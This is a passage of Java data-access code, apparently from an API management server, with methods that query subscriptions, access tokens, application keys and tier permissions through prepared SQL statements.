int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setInt(1, applicationId); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationName the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, String applicationName, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setString(2, applicationName); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationId the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, int applicationId, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_BY_APP_ID_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setInt(2, applicationId); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber * * @param subscriber subscriber * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; //identify subscribeduser used email/ordinalusername String subscribedUserName = getLoginUserName(subscriber.getName()); subscriber.setName(subscribedUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_SUBSCRIBER_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitiveComp = " AND ( (APP.APPLICATION_ID IN (SELECT " + "APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitiveComp; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 2); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); int paramIndex = groupIdArr.length + 1; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, groupingId); ps.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, subscriber.getName()); } result = ps.executeQuery(); Map<String, Set<SubscribedAPI>> map = new TreeMap<String, Set<SubscribedAPI>>(); LRUCache<Integer, Application> applicationCache = new LRUCache<Integer, Application>(100); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); String tierName = result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID); subscribedAPI.setTier(new Tier(tierName)); subscribedAPI.setUUID(result.getString("SUB_UUID")); //setting NULL for subscriber. If needed, Subscriber object should be constructed & // passed in int applicationId = result.getInt("APP_ID"); Application application = applicationCache.get(applicationId); if (application == null) { application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setTokenType(result.getString("APP_TOKEN_TYPE")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); application.setOwner(result.getString("OWNER")); } applicationCache.put(applicationId, application); } subscribedAPI.setApplication(application); if (!map.containsKey(application.getName())) { map.put(application.getName(), new TreeSet<>(new Comparator<SubscribedAPI>() { public int compare(SubscribedAPI o1, SubscribedAPI o2) { int placement = o1.getApiId().getApiName().compareTo(o2.getApiId().getApiName()); if (placement == 0) { return new APIVersionComparator().compare(new API(o1.getApiId()), new API(o2.getApiId ())); } return placement; } })); } map.get(application.getName()).add(subscribedAPI); } for (Map.Entry<String, Set<SubscribedAPI>> entry : map.entrySet()) { subscribedAPIs.addAll(entry.getValue()); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } public boolean isAccessTokenExists(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_EXISTS_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKEN_EXISTS_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { tokenExists = true; } } catch (SQLException e) { handleException("Failed to check availability of the access token. ", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public boolean isAccessTokenRevoked(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_REVOKED_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKE_REVOKED_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { if (!"REVOKED".equals(result.getString("TOKEN_STATE"))) { tokenExists = true; } } } catch (SQLException e) { handleException("Failed to check availability of the access token. ", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public APIKey getAccessTokenData(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; APIKey apiKey = new APIKey(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_DATA_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_DATA_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, APIUtil.encryptToken(accessToken)); result = ps.executeQuery(); if (result.next()) { String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); // todo - check String endUserName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(endUserName, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setAccessToken(decryptedAccessToken); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); List<String> scopes = new ArrayList<String>(); do { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); } } catch (SQLException e) { handleException("Failed to get the access token data. ", e); } catch (CryptoException e) { handleException("Failed to get the access token data. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKey; } public Map<Integer, APIKey> getAccessTokens(String query) throws APIManagementException { Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { Map<Integer, APIKey> tokenDataMapTmp = getAccessTokens(query, getTokenSql(keyStoreTable)); tokenDataMap.putAll(tokenDataMapTmp); } } } else { tokenDataMap = getAccessTokens(query, getTokenSql(null)); } return tokenDataMap; } private Map<Integer, APIKey> getAccessTokens(String query, String getTokenSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); result = ps.executeQuery(); boolean accessTokenRowBreaker = false; Integer i = 0; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); String regex = "(?i)[a-zA-Z0-9_.-|]*" + query.trim() + "(?i)[a-zA-Z0-9_.-|]*"; Pattern pattern; Matcher matcher; pattern = Pattern.compile(regex); matcher = pattern.matcher(accessToken); if (matcher.matches()) { APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private String getTokenSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_TOKEN_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_TOKEN_SQL_SUFFIX; } public Map<Integer, APIKey> getAccessTokensByUser(String user, String loggedInUser) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(user, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_BY_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_BY_USER_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, user); result = ps.executeQuery(); Integer i = 0; boolean accessTokenRowBreaker = false; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String authorizedUserWithDomain = UserCoreUtil.addDomainToName(username, domainName); if (APIUtil.isLoggedInUserAuthorizedToRevokeToken(loggedInUser, authorizedUserWithDomain)) { String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); apiKey.setAuthUser(authorizedUserWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private Map<String, OAuthApplicationInfo> getOAuthApplications(int applicationId) throws APIManagementException { Map<String, OAuthApplicationInfo> map = new HashMap<String, OAuthApplicationInfo>(); OAuthApplicationInfo prodApp = getClientOfApplication(applicationId, "PRODUCTION"); if (prodApp != null) { map.put("PRODUCTION", prodApp); } OAuthApplicationInfo sandboxApp = getClientOfApplication(applicationId, "SANDBOX"); if (sandboxApp != null) { map.put("SANDBOX", sandboxApp); } return map; } public OAuthApplicationInfo getClientOfApplication(int applicationID, String keyType) throws APIManagementException { String sqlQuery = SQLConstants.GET_CLIENT_OF_APPLICATION_SQL; KeyManager keyManager = null; OAuthApplicationInfo oAuthApplication = null; Connection connection = null; PreparedStatement ps = null; ResultSet rs = null; String consumerKey = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationID); ps.setString(2, keyType); rs = ps.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } if (consumerKey != null) { keyManager = KeyManagerHolder.getKeyManagerInstance(); oAuthApplication = keyManager.retrieveApplication(consumerKey); } } catch (SQLException e) { handleException("Failed to get client of application. SQL error", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } return oAuthApplication; } public APIKey getKeyStatusOfApplication(String keyType, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; APIKey key = null; String sqlQuery = SQLConstants.GET_KEY_STATUS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); preparedStatement.setString(2, keyType); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { key = new APIKey(); key.setState(resultSet.getString("STATE")); } } catch (SQLException e) { handleException("Error occurred while getting the State of Access Token", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return key; } /** * Gets ConsumerKeys when given the Application ID. * * @param applicationId * @return {@link java.util.Set} containing ConsumerKeys * @throws APIManagementException */ public Set<String> getConsumerKeysOfApplication(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; Set<String> consumerKeys = new HashSet<String>(); String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { String consumerKey = resultSet.getString("CONSUMER_KEY"); if (consumerKey != null) { consumerKeys.add(consumerKey); } } } catch (SQLException e) { handleException("Error occurred while getting the State of Access Token", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return consumerKeys; } public Set<String> getApplicationKeys(int applicationId) throws APIManagementException { Set<String> apiKeys = new HashSet<String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { apiKeys = getApplicationKeys(applicationId, getKeysSql(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getApplicationKeys(applicationId, getKeysSql(null)); } return apiKeys; } public void updateTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } public TierPermissionDTO getTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_PERMISSION_OF_TIER_SQL; conn = APIMgtDBUtil.getConnection(); 